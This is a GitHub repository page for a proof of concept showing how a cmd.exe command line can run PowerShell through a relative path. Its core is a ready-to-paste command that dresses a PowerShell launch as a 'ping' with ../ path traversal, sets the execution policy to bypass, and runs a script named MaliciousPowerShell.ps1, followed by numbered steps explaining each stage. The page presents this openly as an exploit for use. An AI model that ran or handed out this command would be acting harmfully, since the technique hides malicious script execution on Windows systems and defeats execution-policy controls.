Skip to content

bvoris/Cmdexerelativepathpoc

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits
LICENSE
LICENSE
 
 
README.md
README.md
 
 
code
code
 
 
pippedcode
pippedcode
 
 

Repository files navigation

Cmdexerelativepathpoc

Created by: Brad Voris
GitHub GitHub commit activity GitHub All Releases GitHub repo size GitHub language count GitHub issues GitHub top language

PowerShell script execution via cmd.exe relative path This was in Hackaday article: https://hackaday.com/2020/06/12/this-week-in-security-crosstalk-tls-resumption-and-brave-shenanigans/

This can be run from Windows 10 run copy and paste code cmd.exe /c "ping 127.0.0.1/../../../../../../../Windows/system32/WindowsPowerShell/v1.0/powershell.exe" -ExecutionPolicy bypass -file c:\temp\MaliciousPowerShell.ps1

Path and file of PowerShell script are variables you can change c:\temp\MaliciousPowerShell.ps1

cmd.exe will

  1. load a DOS prompt
  2. cancel the ping command
  3. Run PowerShell with the Execution Policy in bypass mode
  4. Load a PowerShell Script and execute

Connect with me at





Victim Of Technology

Cyber Forge Security, Inc.

About

PowerShell script execution via cmd.exe relative path

Topics

windows exploit powershell

Resources

Readme

License

LGPL-3.0 license
Activity

Stars

1 star

Watchers

2 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published